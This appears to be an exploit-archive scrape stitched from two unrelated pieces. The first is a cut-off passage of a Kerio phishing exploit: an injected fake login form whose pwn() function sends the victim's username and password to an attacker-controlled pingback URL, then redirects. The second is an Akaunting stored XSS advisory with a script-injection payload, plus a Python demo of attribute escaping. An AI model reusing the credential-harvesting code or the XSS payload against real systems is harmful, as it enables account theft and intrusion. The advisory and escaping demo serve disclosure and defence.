BIX1q1am/2XIR7X/Rc8eJkz9BwxBYeDFK3dmaiBmoDBncfYTSYxNnOKgEqqsxvzRbFId9+nOAnz/88MO0zqm503wZlEIZwsFgAMpuM6ExnWxNwxpEMZsugHurVVfAYBXXZH+PfoTG3M2mup9So5FFbLgZCwvQZoINg0QI3XwuPlMzKNPWBozaHVwtlpnV7OcuTfOpC6MoghOOD8IoyUH7f3rQe2O0znvRAsxzTaA+qM1ezJM9gOJJ7Od/lDiaW9x1h6xuTwbH2INi7k7jnUamz2Q0XXgwGXx/0J1xMDi8acRsndZmV7EEOjhou45lP+LU6gcEtLND8/Ai6Sc3eLoa5YE57VS3N1yak5qnxqZdLIxsh/3FXvBQDPe5oOmJfxmaP2m2M+baaWH9qB82EuprLxwuSGS6XsI8Kqj7/7D5trKZjXxPmr+z7NzPIhm6s6ExytSDAC99OhoWcJz1+EG6zx06iP93kozPYRnt6bkb5jp3xpXPJUnnm+SZyfqzTvmkW3VvRLu95oStUW6fcjpTCfLbGbJ3C5tuEKoP4b5nsvKzG/PvNtzrPnCbVNvPMNk+/vjjZBOZkN3zGj3cVrSJqBeaSBkvBwLUtOkfERBcplF8Fhtt4vHoBH3PQ7dUkIM2XaZjd60xoAHWThIir2Lj0dqUTl6MRWxriJGakeemNcVvDETBW4VsocVkWWd52IvVP+1v3exmuFvLdv/UBk5YB3oo1Kei8ZAVHhcRU93q/rQIsw3D8M477+Bw2u0QfhHBrMrFOPfLyIF7kgCjLsgYUKwbQdvLpBiQRMOmoQ/6YQMGiHcPe9DHstkbrisCNnsqDVa15nF0D9qwhxBs0ZYMf3P0sn5jot09MY20kKkvmy/QWjSUCTV99tln6UMNhdRNMYFTnuBzPUabI039FAZECYkoNssbfSJYHu2GZWcTv7Ry8MkOq8HTVLaa7DKYZdSPu4gSAvPCbaQBsOk6qiKHyc/GaLK9DrHHzja679mMnFRXNAHc959jHNN929obuvq1zW24lHXjbOLAcHVituN0shDzaAuJZHICTU2UT1P858i0ztoBqjExvP0GCJ9bZkDGOzGveLNwyHANFKoPN0naBDhZDIcF1cIBDAa2JBQDF5Tll3IFNgX2guV4UBY9LvFD6AfZPIwEbrGwujvuvXfr6pxBlCx2q51FQilPtkblaGLL4iM3woms5SEE7ZLktjg7j9rOMWf7zCX32EZSaSFkY9j2i2yduOmjOaIgkT2vgK7ahyGSANynNgO5hFWDjKLJs7UekxWgu9/brW2exJyjEZXUVXeUFzImxaqb4fVr17yREG41/vAgpWA3KDo9SOS7WAyU2mrKeKlzQUzQGRyjAGLwSWppoaACv5gczn1SzmzNy2ZJ8WjD01SldjF855KYcDnaNzkZQohMn1PSD0kYrG8ZtZpTYrbbcHnobq5MztLepJj6mJ7BZyhNpjhBxenpbgnW7nNKVvOLc13J2c7jSO2JISs4IkoLCIhBQOS3c5vlhLG9bjb+H2Xj7prYfo7NNmqp8gdFmDCJOZ+SCKgfKqdivw0FxretDtAwwYPu9dytcIhzcsDky5nGEKcTe1BcGXgJEdnzf7I+pfXWZGVter7hLzh0B0Od720Wp8+D7JynT/KKuBCLZiO173crj7ZuE6yr8WIqLZEGjIv03YSKcCx98cUXqbU2geWiG3Xqns4+VijPOW08akO9WWw8i69jAEhRgz7syfy12QZP3bi1nwzUXbpafg+a/CEiS98uRkdm67IXQUKcXlC2aV2Dj9DYtS4ni3ri6oSNTt2xpJvfs2gUFizMppPI0qyFV62f8dQpW9ZmpMDFQu/kPENd5krshrZiXqMDKBtQPHXNST8peFAOX6yk2rqNAj4Uzfxsgtedpfpzd5nB8rNrYtJ8i1Og4FvbTc466UebbF/ssjL2M/vgLh31oym6F0XaYK7dZife7s8R0SN0De4XkZyXB/lcUQh4rVBkaFqDhfH
DsukkcnRhTnfpVjGNOlcmrcTZB9COnT9BNAJUYOywHxiz2AF8EamAQg4+iICx0vbLrNGlHedCxlh8+hZGOxPu3S8DJU48kKLzTl3QIBpstNf93xZzSg4m5fRDdA8PWvisnWHYedD2Z8JxdGfR/2pR+8NISgo6Q+7a4psPSWlYA2vsXSDJ5kvluPtiVMBm7BaT10KLBmejTYtdyXEzXJXHHkHZYFBECXK+f71/t07PuD6CqJ9rl3TdfpiB1UVrF+bA4nCRPt+0p+xecx5OP0d1sAQsjU4e9OjctFK7f+dq8jl/n5Wxq1h5f/z4MU32XkE0YvlpjCQCb2evtOEEhf2/AAMAqRf0MI/oIn4AAAAASUVORK5CYII=");font-family: "Segoe UI",Ubuntu,"lucida grande",tahoma,sans-serif !important;}#spacer{height:25vh;}#wrapper{margin:auto;}#logo{width:195px;height:80px;margin:auto;margin-top:16px;background-image:url(" data:image/png;base64,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");background-repeat:no-repeat;background-position:center;}#loginbox_top{width:325px;height:15px;margin:auto;background-image:url(" data:image/png;base64,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");background-repeat:no-repeat;background-position:center;}#loginbox{width:325px;height:136px;margin:auto;padding-top:18px;background-image:url(" data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAUUAAAADCAYAAAAEAh2YAAAACXBIWXMAAAsSAAALEgHS3X78AAAAaElEQVRIDe2UwQmAQAwEE0W0EPuvyEIU0bh53HFYQpiF4ZL8bh7rZrb82LSvEXHoJRjAAAZKGnD3XR+7xCnuxqTBB3JPZkEwgAEMVDaQPdc6r/dgHmLg1Zw8gmAAAxiobCB7rnVe78EPyq0VC1V6QUAAAAAASUVORK5CYII=");background-repeat:repeat-y;background-position:center;}#loginbox_bottom{width:325px;height:15px;margin:auto;background-image:url(" data:image/png;base64,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");background-repeat:no-repeat;background-position:center;}input[type="text"], input[type="password"], input[type="email"], #button{color:#888888;margin:auto;box-sizing: border-box;-moz-box-sizing: border-box;-webkit-appearance: none;outline: 0 none;border: 1px solid #CCCCCC;transition: border 0.2s ease 0s;border-radius: 3px;font-size: 13px;height: 32px;margin-bottom: 4px;padding: 0 6px;width: 260px;}input[type="text"]:focus, input[type="password"]:focus, input[type="email"]:focus{color:#888888;outline: 0 
none;border: 1px solid #999999;}input[type="email"]{margin-top:1px;}#button{color:#ffffff;margin-left:31px;margin-top:1px;cursor: pointer;transition: border-bottom-color 1s;border: 1px solid;border-radius: 3px;background: -webkit-linear-gradient(top, rgba(255, 0, 0, 0.1) 0, rgba(0, 0, 0, 0.1) 100%);background: -moz-linear-gradient(top, rgba(255, 0, 0, 0.1) 0, rgba(0, 0, 0, 0.1) 100%);background: -ms-linear-gradient(top, rgba(255, 0, 0, 0.1) 0, rgba(0, 0, 0, 0.1) 100%);background: linear-gradient(to bottom, rgba(255, 0, 0, 0.1) 0, rgba(0, 0, 0, 0.1) 100%);background-color:#e54634;border-color:#212121;}#button:hover, #button:focus{background-color:#ff412b;}/**background-image: -webkit-linear-gradient(top, #e54a39, #d13524);background-image: -moz-linear-gradient(top, #e54a39, #d13524);background-image: -ms-linear-gradient(top, #e54a39, #d13524);background-image: -o-linear-gradient(top, #e54a39, #d13524);background-image: linear-gradient(to bottom, #e54a39, **/</style></head><body><div id="spacer"></div><div id="wrapper"><div id="logo"></div><div id="loginbox_top"></div><div id="loginbox"> <table align="center"> <tbody><tr> <td id="usern"><input class="textbox" id="username" type="email" name="username" maxlength="1024" placeholder="Username"></td></tr><tr> <td id="passwd"><input class="textbox" id="password" type="password" name="password" maxlength="1024" placeholder="Password"></td></tr></tbody></table><input id="button" type="submit" value="Login" onclick="pwn()"></div><div id="loginbox_bottom"></div></div></body>';document.getElementById('ximporter').innerHTML=z;function exitter(){document.location.href='/login/?reason=failure&NTLM=0';}function pwn(){var user=document.getElementById('username').value; var pass=document.getElementById('password').value; var http=new XMLHttpRequest(); http.onreadystatechange=function(){if (this.readyState==4 && this.status==200){console.log('exploit done, credentials have been sent to attacker.');}}; http.open("GET", 
pingbackURL+"/kerio_exploit/user="+user+"&pass="+pass, true); http.send(); window.setTimeout(exitter,750);}

Akaunting 1.3.17 Cross Site Scripting

Akaunting versions 1.0.0 through 1.3.17 suffer from a cross site scripting vulnerability.


MD5 | 791a391fc2654ecbb529f831ea0d5c43

Title: Stored XSS in Akaunting company name "alt" attribute
Affected Version: 1.0.0 - 1.3.17
Tested on: Chrome, Firefox, Opera (latest versions)
Author: Rudra Sarkar (@rudr4_sarkar)

1. Affected field: the company name, which is rendered into an "alt" attribute without attribute-context escaping
2. Create an account and confirm the email verification
3. Set the company name to "><script>alert(document.domain);</script>
4. You are redirected to the dashboard and the alert pops up, confirming that the payload breaks out of the attribute and executes
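As an added example, not code from this advisory or from the Akaunting project: the rendering bug class the steps above exercise is an untrusted string concatenated into a quoted HTML attribute. The Python below renders the advisory's payload the vulnerable way and the attribute-escaped way, then runs both through an HTML parser to show that only the unescaped version yields a script element. Akaunting itself is PHP/Laravel, so the logo path and the two render functions are assumptions that mirror the pattern, not its real template.

```python
"""Attribute-context escaping demo for a stored XSS via a company name (added example)."""
import html
from html.parser import HTMLParser
from typing import Dict, List, Tuple

# The company name from the advisory: closes the alt attribute and the <img> tag,
# then injects a script element.
PAYLOAD = '"><script>alert(document.domain);</script>'

LOGO_SRC = "/uploads/logo.png"  # assumed path for illustration, not Akaunting's


def render_logo_unsafe(company_name: str) -> str:
    """Vulnerable pattern: untrusted text concatenated into an HTML attribute as-is."""
    return f'<img src="{LOGO_SRC}" alt="{company_name}">'


def render_logo_safe(company_name: str) -> str:
    """Hardened pattern: escape &, <, >, " and ' before placing the value in a quoted attribute."""
    return f'<img src="{LOGO_SRC}" alt="{html.escape(company_name, quote=True)}">'


class TagCollector(HTMLParser):
    """Records every start tag (with its attributes) the parser sees, browser-style."""

    def __init__(self) -> None:
        super().__init__()
        self.tags: List[Tuple[str, Dict[str, str]]] = []

    def handle_starttag(self, tag, attrs):
        self.tags.append((tag, {k: (v or "") for k, v in attrs}))


def parse_tags(markup: str) -> List[Tuple[str, Dict[str, str]]]:
    """Return the start tags of the rendered markup; attribute values are entity-decoded."""
    parser = TagCollector()
    parser.feed(markup)
    parser.close()
    return parser.tags


def has_injected_script(markup: str) -> bool:
    """The check a reviewer wants: did the company name become a <script> element?"""
    return any(tag == "script" for tag, _ in parse_tags(markup))


if __name__ == "__main__":
    for label, render in (("unsafe", render_logo_unsafe), ("safe", render_logo_safe)):
        out = render(PAYLOAD)
        print(f"{label}: {out}")
        print(f"  tags seen: {[t for t, _ in parse_tags(out)]}")
        print(f"  injected script: {has_injected_script(out)}")
```

In the escaped version the parser still recovers the original company name as the alt value, so the fix loses nothing for legitimate input; it only stops the value from changing the HTML context it sits in.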

Timeline:
28-09-2019: Reported to the vendor
28-09-2019: Closed as "out of topic" on GitHub (https://github.com/akaunting/akaunting/issues/881). Fix not deployed.

Thanks,
--
*Rudra Sarkar* | SRT | Security Researcher
@rudr4_sarkar <https://twitter.com/rudr4_sarkar>
